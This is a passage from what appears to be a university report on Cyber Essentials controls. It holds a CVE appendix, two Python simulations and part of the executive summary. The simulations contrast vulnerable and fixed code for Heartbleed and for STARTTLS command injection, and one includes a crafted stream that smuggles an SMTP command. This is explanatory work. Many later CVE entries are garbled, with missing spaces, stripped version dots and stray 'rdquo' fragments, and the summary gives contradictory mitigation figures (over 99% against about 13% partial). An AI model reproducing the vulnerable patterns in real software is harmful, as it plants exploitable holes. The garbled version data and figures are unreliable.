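SECRET = b"-----BEGIN RSA PRIVATE KEY----- (constructed placeholder, not a real key)"
RECORD = build_heartbeat(b"ping", claimed_length=16384)
PROCESS_MEMORY = RECORD + SECRET


def demo() -> Tuple[bytes, Optional[bytes], Optional[bytes]]:
    """Returns (what the vulnerable code echoes, what the fixed code does with the same
    crafted record, what the fixed code does with an honest record)."""
    leaked = vulnerable_response(PROCESS_MEMORY, len(RECORD))
    dropped = fixed_response(PROCESS_MEMORY, len(RECORD))
    honest = build_heartbeat(b"ping")
    answered = fixed_response(honest, len(honest))
    return leaked, dropped, answered


if __name__ == "__main__":
    leaked, dropped, answered = demo()
    print("vulnerable code echoed the secret:", SECRET in leaked)
    print("fixed code dropped the crafted request:", dropped is None)
    print("fixed code still answers an honest request:", answered is not None and answered[3:7] == b"ping")
```

The check is deliberately against the record length the TLS layer already knows, not against anything the peer wrote in the heartbeat itself; a patch-management control catches this class of bug only once the fixed library is actually deployed on every TLS endpoint, which is why the report treats Heartbleed separately.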
CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed .3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
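The "plaintext command injection" named in the CVE-2014-3556 entry (and in CVE-2011-0411 before it) is a buffering mistake: bytes that arrived in the same read as the STARTTLS command are still sitting in the server's input buffer when the TLS handshake finishes, and the server then executes them as if the now-authenticated, encrypted client had sent them. The following Python is an added simulation written for this report, not nginx code: a minimal SMTP command loop run over a constructed byte stream, once without and once with the buffer flush that closes the hole. The function and constant names are this example's own.

```python
from typing import List, Tuple

Executed = List[Tuple[bytes, bool]]  # (command verb, was it treated as arriving over TLS)


def smtp_command_loop(received: bytes, flush_after_starttls: bool) -> Executed:
    """Simulated SMTP server read loop over one raw byte stream from the socket.

    A man-in-the-middle who can see the plaintext phase appends a command to the same
    packet as the client's STARTTLS. With flush_after_starttls=False the server keeps
    that leftover input and runs it after the handshake, attributing it to the TLS
    session; with True it discards whatever was buffered before TLS came up."""
    buf = bytearray(received)
    tls_active = False
    executed: Executed = []
    while True:
        end = buf.find(b"\r\n")
        if end < 0:
            break                      # wait for more data (none in this simulation)
        line = bytes(buf[:end])
        del buf[:end + 2]
        verb = line.split(b" ", 1)[0].upper()
        executed.append((verb, tls_active))
        if verb == b"STARTTLS" and not tls_active:
            tls_active = True          # a real server performs the TLS handshake here
            if flush_after_starttls:
                buf.clear()            # the fix: anything read before the handshake is untrusted
    return executed


# Constructed stream: the attacker piggybacks RSET onto the client's STARTTLS packet.
INJECTED_STREAM = b"EHLO client.example\r\nSTARTTLS\r\nRSET\r\n"


def demo() -> Tuple[Executed, Executed]:
    """Returns (commands run by the vulnerable loop, commands run by the fixed loop)."""
    return (smtp_command_loop(INJECTED_STREAM, flush_after_starttls=False),
            smtp_command_loop(INJECTED_STREAM, flush_after_starttls=True))


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("vulnerable:", vulnerable)   # RSET executes with tls_active=True
    print("fixed:     ", fixed)        # RSET never executes
```

Flushing is the minimal fix; a stricter server rejects the STARTTLS request outright when the buffer is not empty after the command line, since a legitimate client has no reason to pipeline anything past STARTTLS. The same rule applies to every protocol with an opportunistic upgrade (IMAP, POP3, FTP AUTH TLS), which is why the entry cross-references CVE-2011-0411.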
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESS – Security Lancaster, Page 26 of 28
Survey Responses
Executive Summary

Findings
This report assesses the Cyber Essentials controls' effectiveness in mitigating cyber-threats.
Two hundred randomly selected internet-originating vulnerabilities are analysed for mitigation across four SME networks, with and without the Cyber Essentials controls in place. A network built from survey responses is used to assess the typicality of the SME networks, as well as to develop a broader understanding of typical SME network configurations and security practice.
The aggregated results show that without the Cyber Essentials controls none of the attacks assessed were mitigated on any network. This, more than anything else, should be understood by SMEs: taking no action to combat cyber threats simply isn't an option.
With the CE tools, more than 99% of the vulnerabilities in the SMEs interviewed were mitigated, as shown in the figure below, which depicts the aggregated results across all cases studied. The approx. 13% of exploits only partially mitigated rely on hardware or software vendors to release patches promptly and effectively to combat any vulnerabilities.
Once the vendor has released a security patch, the Patch Management component of Cyber Essentials ensures that the system returns to a secure state. However, up until a patch is released there remains a vulnerability in the network. For this reason it should be stressed that SMEs frequently consider what services or software are installed, whether they are necessary, and whether a more secure alternative is available.
The few vulnerabilities not mitigated by Cyber Essentials are as such because of fundamental hard-coded flaws in hardware or software that cannot be updated or patched to a secure state.
Figure 1 Cyber Essentials Aggregated Vulnerability Mitigation Results
Recommendations
Although the Cyber Essentials tools have been shown to successfully mitigate the vast majority of the attacks assessed, it is important to note that only 'commodity-level' exploits (as defined by the Cyber Essentials Framework)[10] viable for a remote attack have been considered.
The scope of this report does not address vulnerability to insider threats, social engineering, physically proximate attackers or other targeted attacks; it may be recommended that a follow-up study with a wider scope be carried out to investigate the risks from other forms of attack with the use of Cyber Essentials.
The '10 Steps to Cyber Security' report published by CESG[2] highlights that, in order to maximise the security of a network, it is essential not only to consider the prevention of attacks with the use of tools, but also to ensure that all employees are adequately educated in network security and treated with scrutiny through access logs and data-loss-prevention schemes, in order to achieve a secure business in the face of potential local and remote attacks. We would recommend that, especially for larger organisations, additional security measures such as these be put in place.
For hardware or software identified as inherently flawed, resulting in unmitigatable vulnerabilities, our recommendation is that these pieces of software or hardware be avoided at all costs when developing an SME network. In addition, a global list of unsafe products could be collectively developed and made publicly available. This relates to our last recommendation of integrating Cyber Essentials further with collective security approaches such as the Cyber-security Information Sharing Partnership (CiSP)[4]. These approaches keep SMEs up to date with the latest information about vulnerabilities and other cyber-threat information.
Introduction

